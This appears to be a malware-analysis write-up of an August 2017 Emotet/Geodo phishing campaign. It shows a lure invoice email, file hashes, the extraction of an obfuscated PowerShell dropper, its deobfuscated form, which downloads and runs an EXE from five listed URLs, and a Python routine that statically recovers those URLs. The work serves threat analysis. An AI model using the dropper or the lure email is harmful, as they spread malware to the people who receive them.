- #Emotet / #Geodo campaign - 20170814
- ===== email sample
- Received: from mout-bounce.kundenserver.de ([212.227.15.57]) by
- myserver.example.com with ESMTP/TLS/DHE-RSA-AES128-GCM-SHA256; 14 Aug 2017
- 15:26:17 +0000
- Received: from 10.0.0.33 ([80.55.192.210]) by mrelayeu.kundenserver.de
- (mreue002 [212.227.15.167]) with ESMTPSA (Nemesis) id
- 0M1eYM-1dSEXv06NW-00tk4F for <alejandro.castro@example.com>; Mon, 14 Aug 2017
- 17:26:13 +0200
- From: "Victim.Sender@" <example.com>
- To: "Victim Recepient" <victim.recepient@example.com>
- Subject: re: Invoice 7598
- Thread-Topic: Invoice 7598
- Thread-Index: AQHTFRHPw9OpBpNAQEKYLKx8U0qMSQ==
- Date: Mon, 14 Aug 2017 18:26:12 +0200
- Message-ID: <22953597781.2017814152612@example.com>
- Content-Language: es-MX
- x-ironport-av: E=Sophos;i="5.41,373,1498521600"; d="scan'208";a="96571278"
- received-spf: None (myserver.example.com: no sender authenticity information
- available from domain of postmaster@mout-bounce.kundenserver.de)
- identity=helo; client-ip=212.227.15.57; receiver=imyserver.example.com;
- envelope-from=""; x-sender="postmaster@mout-bounce.kundenserver.de";
- x-conformance=sidf_compatible
- Content-Type: text/plain; charset="iso-8859-1"
- Content-Transfer-Encoding: quoted-printable
- MIME-Version: 1.0
- Hello Victim Recepient,
- Here is your invoice.
- If you have any questions or need further assistance, please let us know.
- Amount due: $1518.99 08/14/2017.
- View And Pay Your Invoice Her.
- http://amgtrade.eu/VDUC152846/
- Most sincerely,
- Victim.Sender@example.com
- ===== Downloader
- hxxp://amgtrade.eu/VDUC152846/
- 9347268076QJOT.doc
- 5df3016ba1cfd870d1d72e75ab9ec1d0a08a7e11d9fe7ec6b32fa0ce468206e7
- https://www.virustotal.com/en/file/5df3016ba1cfd870d1d72e75ab9ec1d0a08a7e11d9fe7ec6b32fa0ce468206e7/analysis/
- ===== Getting powershell script from the DOC
- exiftool 9347268076QJOT.doc |grep Comments| sed -e "s/^Comments.* : //" | base64 -d
- https://www.virustotal.com/en/file/e9f57c8ce9f9b6ec20d8e6a0ea712586a26eed16524c47307d6bfb6ac2a39b00/analysis/
- 9347268076QJOT.ps1
- ${Wsc`RI`pt} = &("{2}{0}{1}"-f 'j','ect','new-ob') -ComObject ("{0}{2}{1}"-f 'WS','ipt.Shell','cr');${wEbcL`iE`Nt} = .("{0}{2}{1}" -f 'new-','ject','ob') ("{0}{2}{1}{3}{4}" -f 'S','tem.Net.WebCli','ys','e','nt');${R`AnD`OM} = &("{2}{1}{0}" -f 'ject','b','new-o') ("{2}{1}{0}"-f 'm','do','ran');${UR`lS} = ("{1}{2}{23}{12}{22}{28}{10}{27}{16}{20}{33}{35}{25}{13}{37}{3}{4}{9}{5}{30}{21}{17}{34}{8}{31}{19}{24}{0}{32}{15}{14}{29}{11}{38}{7}{26}{6}{36}{18}" -f's','h','tt','s','.c','cLQsCv/,h','/hwPu','o.','udujem.c','om.br/Q','S','/,http://nemesismedia.','r','p:/','G','cf','k','//','YC/','/IXCKoJdH/,http://s','x',':','cameron.com','p://trevo','hani','tt','uk','nm','/L','yQLtJMI','ttp','om','s.com/pub/','T/','l',',h','nc','/forteboy','c').("{1}{0}" -f 'plit','S').Invoke(',');${N`AmE} = ${rA`NdOm}.("{0}{1}"-f'ne','xt').Invoke(1, 65536);${PA`TH} = ${e`Nv:Te`mp} + '\' + ${N`AMe} + ("{1}{0}" -f'xe','.e');foreach(${U`RL} in ${uR`LS}){try{${W`eBcl`I`eNt}.("{2}{0}{1}{3}"-f 'oadFi','l','Downl','e').Invoke(${U`Rl}.("{1}{0}"-f'ing','ToStr').Invoke(), ${pA`TH});&("{3}{1}{0}{2}"-f 'roce','-P','ss','Start') ${pa`TH};break;}catch{.("{1}{0}{2}"-f 'e-ho','writ','st') ${_}."exce`ptIon"."M`esSage";}}
- ===== Deobfuscation powershell
- $ cat 9347268076QJOT.ps.001
- ${WscRIpt} = new-object -ComObject 'WScript.Shell'
- ${wEbcLiENt} = new-object 'System.Net.WebClient'
- ${RAnDOM} = new-object 'random'
- ${URlS} = ("http://trevorcameron.com/LSnmkxT/{35}{25}{13}{37}{3}{4}{9}{5}{30}{21}{17}{34}{8}{31}{19}{24}{0}{32}{15}{14}{29}{11}{38}{7}{26}{6}{36}{18}"
- -f
- 's','h','tt','s','.c','cLQsCv/,h','/hwPu','o.','udujem.c','om.br/Q',
- 'S','/,http://nemesismedia.','r','p:/','G','cf','k','//','YC/','/IXCKoJdH/,http://s',
- 'x',':','cameron.com','p://trevo','hani','tt','uk','nm','/L','yQLtJMI',
- 'ttp','om','s.com/pub/','T/','l',',h','nc','/forteboy','c').
- Split.Invoke(',');
- ${NAmE} = ${rANdOm}.next.Invoke(1, 65536);
- ${PATH} = ${eNv:Temp} + '\' + ${NAMe} + ("{1}{0}" -f'xe','.e');
- foreach(${URL} in ${uRLS}){
- try{
- ${WeBclIeNt}.downloadFile.Invoke(${URl}.ToString.Invoke(), ${pATH});
- Start-Process ${paTH};
- break;
- }catch{
- write-host ${_}."exceptIon"."MesSage";
- }
- }
- ===== Deobfuscating the URLs
- ipython
- In [1]: a=['s','h','tt','s','.c','cLQsCv/,h','/hwPu','o.','udujem.c','om.br/Q','S','/,http://nemesismedia.','r','p:/','G','cf','k','//','YC/','/IXCKoJdH/,http://s','x',':','cameron.com','p://trevo','hani','tt','uk','nm','/L','yQLtJMI','ttp','om','s.com/pub/','T/','l',',h','nc','/forteboy','c']
- In [4]: URLS="{1}{2}{23}{12}{22}{28}{10}{27}{16}{20}{33}{35}{25}{13}{37}{3}{4}{9}{5}{30}{21}{17}{34}{8}{31}{19}{24}{0}{32}{15}{14}{29}{11}{38}{7}{26}{6}{36}{18}"
- In [5]: URLS.replace("{", "a[")
- Out[5]: 'a[1}a[2}a[23}a[12}a[22}a[28}a[10}a[27}a[16}a[20}a[33}a[35}a[25}a[13}a[37}a[3}a[4}a[9}a[5}a[30}a[21}a[17}a[34}a[8}a[31}a[19}a[24}a[0}a[32}a[15}a[14}a[29}a[11}a[38}a[7}a[26}a[6}a[36}a[18}'
- In [6]: URLS.replace("{", "a[").replace("}", "] + ")
- Out[6]: 'a[1] + a[2] + a[23] + a[12] + a[22] + a[28] + a[10] + a[27] + a[16] + a[20] + a[33] + a[35] + a[25] + a[13] + a[37] + a[3] + a[4] + a[9] + a[5] + a[30] + a[21] + a[17] + a[34] + a[8] + a[31] + a[19] + a[24] + a[0] + a[32] + a[15] + a[14] + a[29] + a[11] + a[38] + a[7] + a[26] + a[6] + a[36] + a[18] + '
- In [14]: eval(URLS.replace("{", "a[").replace("}", "] + ")[0:-3])
- Out[14]: 'http://trevorcameron.com/LSnmkxT/,http://forteboys.com.br/QcLQsCv/,http://ludujem.com/IXCKoJdH/,http://shaniss.com/pub/cfGyQLtJMI/,http://nemesismedia.co.uk/hwPuncYC/'
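The two manual passes above (the hand-edited `.ps.001` file and the ipython `eval` trick) can be done mechanically and without `eval` by resolving the `{n}` placeholders of each `-f` template directly against its argument list. The Python below is an added example, not part of the original paste: it strips the backtick-split identifiers, rewrites every `("…" -f 'a','b',…)` expression in place (so it covers the cmdlet and method names, not just the URL string), and pulls the URL list out of the result. `ARGS`, `TEMPLATE` and `EXPECTED_URLS` are copied from the script and output above; `SAMPLE` is a constructed reproduction of four statements from the obfuscated one-liner, and the function names are my own.

```python
import re

# Argument list and format template copied from the dropper's URL expression above.
ARGS = ['s', 'h', 'tt', 's', '.c', 'cLQsCv/,h', '/hwPu', 'o.', 'udujem.c', 'om.br/Q',
        'S', '/,http://nemesismedia.', 'r', 'p:/', 'G', 'cf', 'k', '//', 'YC/',
        '/IXCKoJdH/,http://s', 'x', ':', 'cameron.com', 'p://trevo', 'hani', 'tt',
        'uk', 'nm', '/L', 'yQLtJMI', 'ttp', 'om', 's.com/pub/', 'T/', 'l', ',h',
        'nc', '/forteboy', 'c']
TEMPLATE = ("{1}{2}{23}{12}{22}{28}{10}{27}{16}{20}{33}{35}{25}{13}{37}{3}{4}{9}{5}"
            "{30}{21}{17}{34}{8}{31}{19}{24}{0}{32}{15}{14}{29}{11}{38}{7}{26}{6}{36}{18}")
# The five payload URLs the paste recovers from that expression.
EXPECTED_URLS = [
    "http://trevorcameron.com/LSnmkxT/",
    "http://forteboys.com.br/QcLQsCv/",
    "http://ludujem.com/IXCKoJdH/",
    "http://shaniss.com/pub/cfGyQLtJMI/",
    "http://nemesismedia.co.uk/hwPuncYC/",
]

PLACEHOLDER = re.compile(r"\{(\d+)\}")
# ("{1}{0}" -f 'a','b'), optionally preceded by the & or . call operator.
FORMAT_EXPR = re.compile(
    r"""([&.]?)\(\s*"((?:\{\d+\})+)"\s*-f\s*((?:'[^']*'\s*,\s*)*'[^']*')\s*\)""")
VAR_NAME = re.compile(r"\$\{([^}]*)\}")        # ${Wsc`RI`pt}
QUOTED_NAME = re.compile(r'"([A-Za-z`]+)"')    # ."exce`ptIon"
URL_RE = re.compile(r"https?://[^\s'\",]+")


def resolve_format(template, args):
    """Substitute each {n} in a PowerShell -f template with args[n]; no eval involved."""
    def pick(m):
        i = int(m.group(1))
        return args[i] if i < len(args) else m.group(0)   # leave dangling indexes visible
    return PLACEHOLDER.sub(pick, template)


def _rewrite(m, script):
    op, template, argstr = m.group(1), m.group(2), m.group(3)
    value = resolve_format(template, re.findall(r"'([^']*)'", argstr))
    if op == "&":                       # &("...") -> bare command name
        return value
    if op == ".":
        prev = script[m.start() - 1] if m.start() > 0 else ""
        if prev in ")}":                # ${obj}.(...) / (...).(...) is member access
            return "." + value
        return value                    # a leading .(...) is the dot-source call operator
    return "'" + value + "'"            # plain operand: keep it a string literal


def deobfuscate(script):
    """Resolve -f expressions and strip backtick-split identifiers from a script."""
    original = script
    script = FORMAT_EXPR.sub(lambda m: _rewrite(m, original), original)
    script = VAR_NAME.sub(lambda m: "${" + m.group(1).replace("`", "") + "}", script)
    script = QUOTED_NAME.sub(lambda m: '"' + m.group(1).replace("`", "") + '"', script)
    return script


def extract_urls(script):
    """Return every http(s) URL that appears once the script is deobfuscated."""
    return URL_RE.findall(deobfuscate(script))


# Constructed sample: statements from the obfuscated one-liner above, with the URL
# statement rebuilt from ARGS/TEMPLATE so the example is self-contained.
URL_EXPR = '("' + TEMPLATE + '" -f' + ",".join("'%s'" % a for a in ARGS) + ")"
SAMPLE = "\n".join([
    r'''${Wsc`RI`pt} = &("{2}{0}{1}"-f 'j','ect','new-ob') -ComObject ("{0}{2}{1}"-f 'WS','ipt.Shell','cr');''',
    r'''${wEbcL`iE`Nt} = .("{0}{2}{1}" -f 'new-','ject','ob') ("{0}{2}{1}{3}{4}" -f 'S','tem.Net.WebCli','ys','e','nt');''',
    r'''${UR`lS} = ''' + URL_EXPR + r'''.("{1}{0}" -f 'plit','S').Invoke(',');''',
    r'''${W`eBcl`I`eNt}.("{2}{0}{1}{3}"-f 'oadFi','l','Downl','e').Invoke(${U`Rl}.("{1}{0}"-f'ing','ToStr').Invoke(), ${pA`TH});''',
    r'''}catch{.("{1}{0}{2}"-f 'e-ho','writ','st') ${_}."exce`ptIon"."M`esSage";}''',
])

if __name__ == "__main__":
    print(deobfuscate(SAMPLE))
    for url in extract_urls(SAMPLE):
        print("IOC:", url)
```

Because the resolver only substitutes string indexes, it never executes anything from the sample; the same regexes work on the full one-liner from the paste, and anything the pattern does not recognise is left untouched rather than guessed at.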
- ===== Download of EXE:
- hxxp://trevorcameron.com/LSnmkxT/
- -> bb3887abecf81ccb0651afe420944997541070cf6a8c715a6239d507e9130cdd
- hxxp://forteboys.com.br/QcLQsCv/
- hxxp://ludujem.com/IXCKoJdH/
- -> 2d8c8c041ce20d317055abf412bbccc46cc7d7bee6ae70121904e25d8fef75dd
- hxxp://shaniss.com/pub/cfGyQLtJMI/
- -> fcb60d4744cf36b48196ebf4cc432e3958aef7c3cc66ae46f5abd4a2feb73d49
- hxxp://nemesismedia.co.uk/hwPuncYC/
- -> b2af37edf27969d2781a25074f38cb673d0bb01f13525a6309ac9cf37be74d3f
- ===== Pivot on twitter:
- https://twitter.com/James_inthe_box/status/897077496058748928/photo/1
- http://seodrama.com/QJIL662797/
- https://www.hybrid-analysis.com/sample/3728cecd2be075b09a3a6d8d8c5923fe14cf381e3070266cf05fa51585def305?environmentId=100